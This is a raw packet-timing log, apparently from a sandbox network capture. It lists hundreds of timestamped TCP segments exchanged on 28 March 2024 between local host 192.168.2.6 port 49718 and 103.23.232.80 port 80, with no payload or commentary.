                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.541712046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.541724920 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.541748047 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.541768074 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.541990042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858689070 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858738899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858747959 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858755112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858764887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858772993 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858781099 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858795881 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858834982 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858885050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858906031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858928919 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858954906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.858985901 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859004974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859024048 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859026909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859042883 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859055042 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859057903 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859081030 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859119892 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859170914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859184980 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859199047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859210968 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859214067 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859229088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859240055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859261036 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859280109 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859294891 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859308958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859330893 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859334946 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859349012 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859359980 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859385967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859388113 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859416962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859461069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859477997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859503031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859503984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859530926 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859540939 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859574080 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859577894 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859612942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859627962 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859658003 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859673023 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859680891 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859697104 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859707117 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859724045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859736919 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859761953 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859802008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859816074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859831095 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859844923 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859853983 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859879017 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859899044 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859908104 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859915972 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859958887 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859962940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.859978914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860028028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860044956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860058069 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860069990 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860088110 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860105038 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860112906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860127926 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860141039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860166073 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860178947 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860184908 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860253096 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860268116 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860301971 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860321999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860325098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860337019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860388041 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860389948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860407114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860420942 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860446930 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860447884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860476971 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860491037 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860522032 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860553026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860578060 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860599041 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860600948 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860624075 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860636950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860665083 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860677958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860711098 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860738039 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860743046 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860757113 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860797882 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860799074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860835075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860879898 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860896111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860924006 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860941887 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860954046 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.860981941 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861004114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861020088 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861028910 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861069918 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861069918 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861113071 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861129045 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861141920 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861155987 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861167908 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861183882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861202002 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861221075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861222982 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861248970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861287117 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861331940 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861335993 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861351967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861371994 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861377954 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861413956 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861416101 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.861443043 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.863327026 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867691040 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867717028 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867729902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867744923 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867779970 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867795944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867830992 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867851019 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867875099 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867892027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867907047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867918015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867948055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867960930 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.867984056 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868031025 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868035078 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868050098 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868067026 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868082047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868092060 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868120909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868123055 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868146896 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868181944 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868191004 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868241072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868254900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868299007 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868313074 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868328094 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868340969 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868350983 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868386984 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868402004 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868417978 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868429899 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868454933 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868475914 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868489027 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868501902 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868526936 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868526936 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868554115 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868571997 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868586063 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868607044 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868645906 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868660927 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868679047 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868690968 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868717909 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868726015 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868735075 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868777037 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868804932 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868819952 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868832111 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868877888 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868884087 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868891954 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868892908 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868908882 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868920088 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868935108 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868949890 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868962049 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.868999004 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869039059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869045973 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869076967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869088888 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869127989 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869143009 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869155884 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869169950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869170904 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869198084 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869204998 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869237900 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869266033 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869368076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869420052 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869426966 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869435072 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869478941 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869483948 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869501114 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869539022 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869553089 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869612932 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869626999 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869671106 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869678974 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869707108 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869729996 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869755030 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869771957 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869807959 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869847059 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869894028 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869965076 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.869982004 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870022058 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870026112 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870100975 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870131969 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870151043 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870177031 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870193958 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870225906 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870250940 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870270967 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870285034 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870294094 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870301008 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870327950 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870327950 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870367050 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870385885 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870395899 CET4971880192.168.2.6103.23.232.80
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870413065 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870429039 CET8049718103.23.232.80192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:51:17.870429993 CET4971880192.168.2.6103.23.232.80
